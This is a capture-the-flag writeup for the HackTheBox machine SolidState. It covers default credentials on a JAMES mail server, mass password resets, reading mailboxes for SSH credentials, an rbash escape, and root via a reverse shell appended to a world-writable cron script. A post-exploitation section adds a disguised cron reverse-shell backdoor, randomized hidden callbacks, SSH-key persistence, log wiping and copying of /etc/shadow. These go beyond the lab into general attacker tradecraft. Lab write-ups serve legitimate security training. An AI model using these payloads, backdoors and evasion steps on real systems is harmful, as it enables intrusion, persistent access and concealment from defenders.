Post

HackTheBox SolidState

Writeup for HackTheBox SolidState

HackTheBox SolidState

Machine Synopsis

Key Exploitation Techniques:

  • JAMES Remote Administration Tool default credentials exploitation
  • Email server user enumeration and password manipulation
  • Email content analysis for SSH credential discovery
  • Restricted shell bypass via SSH command execution
  • Cronjob exploitation through writable script overwrite

Reconnaissance & Enumeration

Port Discovery

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ nmap -sC -sV -A -p- 10.10.10.51
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp   open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.8 [10.10.14.8]), PIPELINING, ENHANCEDSTATUSCODES
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp  open  pop3    JAMES pop3d 2.3.2
119/tcp  open  nntp    JAMES nntpd (posting ok)
4555/tcp open  rsip?
| fingerprint-strings: 
|   GenericLines: 
|     JAMES Remote Administration Tool 2.3.2
|     Please enter your login and password
|     Login id:
|     Password:
|     Login failed for 
|_    Login id:

Key Services:

  • JAMES Mail Server (SMTP, POP3, NNTP)
  • JAMES Remote Administration Tool (port 4555)
  • Apache web server

Web Application Analysis

website

website_services

The website shows “Solid State Security” company page with minimal functionality and no obvious attack vectors.

1
2
# Directory enumeration yields no significant results
$ gobuster dir -u http://10.10.10.51 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Exploitation

JAMES Administration Tool Access

Default Credential Testing

1
2
3
4
5
6
7
8
9
10
# Connect to JAMES Remote Administration Tool
$ nc -v 10.10.10.51 4555
(UNKNOWN) [10.10.10.51] 4555 (?) open
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands

Success: Default credentials root:root provide administrative access.

User Enumeration and Password Reset

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# List existing mail accounts
HELP
Currently implemented commands:
help                                      display this help
listusers                                 display existing accounts
countusers                                display the number of existing accounts
adduser [username] [password]             add a new user
verify [username]                         verify if specified user exist
deluser [username]                        delete existing user
setpassword [username] [password]         sets a user's password

listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin

# Reset all user passwords to 'password'
setpassword james password
Password for james reset
setpassword thomas password
Password for thomas reset
setpassword john password
Password for john reset
setpassword mindy password
Password for mindy reset
setpassword mailadmin password
Password for mailadmin reset

Email Content Analysis

POP3 Access and Email Retrieval

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# Access john's mailbox
$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 

USER john
+OK
PASS password
+OK Welcome john

LIST
+OK 1 743
1 743
.

RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <john@localhost>;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

.
QUIT

Credential Discovery in mindy’s Mailbox

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# Access mindy's mailbox
$ telnet 10.10.10.51 110
USER mindy
+OK
PASS password
+OK Welcome mindy

LIST
+OK 2 1945
1 1109
2 836
.

RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,

Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

.

SSH Credentials: mindy:P@55W0rd1!2@

SSH Access and Restricted Shell Bypass

Initial SSH Connection

1
2
3
4
5
6
7
8
$ ssh mindy@10.10.10.51
mindy@10.10.10.51's password: P@55W0rd1!2@
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142

mindy@solidstate:~$ whoami
-rbash: whoami: command not found
mindy@solidstate:~$ id
-rbash: id: command not found

Restriction: User is in a restricted bash shell (rbash).

Restricted Shell Bypass

Method 1: SSH Command Execution

1
2
3
4
5
# Execute commands directly via SSH
$ ssh mindy@10.10.10.51 -t "bash --noprofile"
mindy@10.10.10.51's password: P@55W0rd1!2@
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
mindy

Method 2: Apache James RCE (Alternative)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# Using searchsploit for Apache James exploit
$ searchsploit Apache James Server 2.3.2
Apache James Server 2.3.2 - Remote Command Execution | linux/remote/35513.py

# Download and modify exploit
$ searchsploit -m 35513
$ python 35513.py 10.10.10.51

# Setup netcat listener
$ nc -nlvp 1234

# Payload executes when user logs into email
# Triggers reverse shell as mindy
# Reverse shell received
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.51] 48670
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat user.txt
914d0a4ebc177889b5b89a23f556fd75

Privilege Escalation

System Enumeration

1
2
3
4
# Transfer LinPEAS for enumeration
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ wget 10.10.14.8/linpeas.sh
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ chmod +x linpeas.sh
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ./linpeas.sh

Cronjob Discovery

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# LinPEAS reveals interesting file in /opt
╔══════════╣ Unexpected in /opt (usually empty)
total 16
drwxr-xr-x  3 root root 4096 Aug 22  2017 .
drwxr-xr-x 22 root root 4096 Apr 26  2021 ..
drwxr-xr-x 11 root root 4096 Apr 26  2021 james-2.3.2
-rwxrwxrwx  1 root root  105 Aug 22  2017 tmp.py

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()

Key Finding: /opt/tmp.py is world-writable and appears to be executed periodically.

Process Monitoring

1
2
3
4
5
6
7
8
# Transfer and run pspy for process monitoring
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ wget 10.10.14.8/pspy32
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ chmod +x pspy32
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ./pspy32

# Process execution observed
2022/05/09 04:03:01 CMD: UID=0    PID=1716   | /bin/sh -c python /opt/tmp.py
2022/05/09 04:03:01 CMD: UID=0    PID=1717   | python /opt/tmp.py

Confirmation: /opt/tmp.py is executed by root via cronjob.

Cronjob Exploitation

Payload Creation and Deployment

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# Create Python reverse shell payload
$ cat > py_revshell << 'EOF'
import os
os.system("bash -c 'exec bash -i &>/dev/tcp/10.10.14.8/9999 <&1'")
EOF

# Host payload
$ python3 -m http.server 80

# Append payload to tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ curl http://10.10.14.8/py_revshell >> tmp.py

# Verify modification
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()
import os
os.system("bash -c 'exec bash -i &>/dev/tcp/10.10.14.8/9999 <&1'")

Root Shell Acquisition

1
2
3
4
5
6
7
8
9
10
# Setup netcat listener
$ nc -nlvp 9999
listening on [any] 9999 ...

# Wait for cronjob execution
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.51] 40852
root@solidstate:~# whoami
root
root@solidstate:~# cat /root/root.txt
b4c9723a28899b1c45db281d99cc87c9

Post-Exploitation Techniques

Persistence Methods

SSH Key Persistence

1
2
3
4
5
6
7
# Generate SSH key pair
$ ssh-keygen -t rsa -b 4096 -f solidstate_persistence

# Install as root
# mkdir -p /root/.ssh
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /root/.ssh/authorized_keys
# chmod 600 /root/.ssh/authorized_keys

JAMES Mail Server Backdoor

1
2
3
4
5
6
7
# Create mail account for persistence
# echo "adduser backdoor password123" | nc 10.10.10.51 4555

# Modify mail templates for code execution
# cat > /root/apps/james/SAR-INF/config.xml << 'EOF'
# [Include malicious mail processing rules]
# EOF

Cron Backdoor Maintenance

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# Create more sophisticated backdoor
# cat > /opt/system_check.py << 'EOF'
#!/usr/bin/env python
import subprocess
import time
import socket

def check_connection():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect(("10.10.14.8", 4444))
        subprocess.call(["/bin/bash", "-i"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
        s.close()
    except:
        pass

check_connection()
EOF

# Add to crontab
# echo "*/10 * * * * /usr/bin/python /opt/system_check.py" >> /etc/crontab

Defense Evasion

Mail Server Log Cleanup

1
2
3
4
5
6
7
# Clear JAMES mail logs
# > /root/apps/james/logs/mailet.log
# > /root/apps/james/logs/james.log

# Clear system mail logs
# > /var/log/mail.log
# > /var/log/mail.err

Process Hiding

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# Modify cronjob execution to be less obvious
# cat > /opt/tmp.py << 'EOF'
#!/usr/bin/env python
import os
import sys
import time
import random

# Original cleanup function
try:
    os.system('rm -r /tmp/* ')
except:
    pass

# Hidden backdoor with random delay
time.sleep(random.randint(1, 30))
if random.randint(1, 10) == 5:  # Execute 10% of the time
    os.system("bash -c 'exec bash -i &>/dev/tcp/10.10.14.8/9999 <&1' &")
sys.exit()
EOF

Lateral Movement Preparation

Email Server Exploitation

1
2
3
4
# Enumerate all mail accounts and passwords
# Connect to JAMES admin tool and extract user list
# Access all mailboxes for credential discovery
# Search for additional systems and credentials in emails

Network Discovery

1
2
3
4
5
# Discover email-related infrastructure
# ss -tlnp | grep -E "(25|110|143|993|995)"

# Scan for internal mail servers
# for i in {1..254}; do ping -c 1 -W 1 192.168.1.$i | grep "64 bytes" | cut -d" " -f4 | tr -d ":"; done

Credential Harvesting

1
2
3
4
5
6
7
8
# Extract mail database if present
# find /root/apps/james -name "*.db" -exec cp {} /tmp/ \;

# Search mail content for credentials
# grep -r "password\|pass\|credential" /root/apps/james/var/mail/

# Extract shadow file
# cp /etc/shadow /tmp/shadow.backup

Alternative Exploitation Methods

Direct JAMES Exploitation

1
2
3
4
5
6
7
8
9
10
# Alternative Apache James RCE exploit
$ python 35513.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.

# Trigger by SSH login as any user
$ ssh mindy@10.10.10.51

SMTP Enumeration

1
2
3
4
5
# SMTP user enumeration
$ smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.10.10.51

# SMTP relay testing
$ swaks --to test@10.10.10.51 --from test@attacker.com --server 10.10.10.51

Alternative Privilege Escalation

Kernel Exploitation

1
2
3
4
5
6
# Check kernel version
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ uname -a
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686 GNU/Linux

# Search for applicable exploits
$ searchsploit linux kernel 4.9 | grep -i privilege

SUID Binary Analysis

1
2
3
4
5
# Find SUID binaries
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ find / -perm -4000 -type f 2>/dev/null

# Check for custom SUID binaries
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -la /usr/local/bin/

This post is licensed under CC BY 4.0 by the author.